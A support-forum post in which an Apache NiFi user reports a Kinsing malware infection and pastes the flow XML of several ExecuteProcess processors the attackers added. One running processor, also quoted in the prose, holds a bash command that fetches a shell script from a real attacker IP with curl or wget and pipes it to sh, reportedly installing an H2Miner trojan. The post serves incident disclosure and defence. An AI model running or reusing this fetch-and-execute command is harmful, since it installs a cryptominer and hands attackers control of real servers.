Support Questions
Find answers, ask questions, and share your expertise

Kinsing malware attack in NIFI

Highlighted

Kinsing malware attack in NIFI

New Contributor

Hi, we have recently attacked by a malware called Kinsing. Adds some ExecuteProcess proccesors at positions x=0.0 y=0.0. to call curl -s 194.40.243.61/ni.sh||wget -q -O- 194.40.243.61/ni.sh)|sh . Then download a 13.96 Mb Linux.Trojan.H2Miner.11.23.vyiz file.

 

 

<processor>
<id>1c9a1065-1006-1036-7699-e65474d32047</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>1c9a1066-1006-1036-bcc8-f49877defa39</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>1c9a1067-1006-1036-d132-ededb5e5f411</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>25ae4a26-0176-1000-0c40-337865e61a7b</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>3600 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>RUNNING</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
<value>bash</value>
</property>
<property>
<name>Command Arguments</name>
<value>-c "(curl -s 194.40.243.61/ni.sh||wget -q -O- 194.40.243.61/ni.sh)|sh"</value>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
<autoTerminatedRelationship>success</autoTerminatedRelationship>
</processor>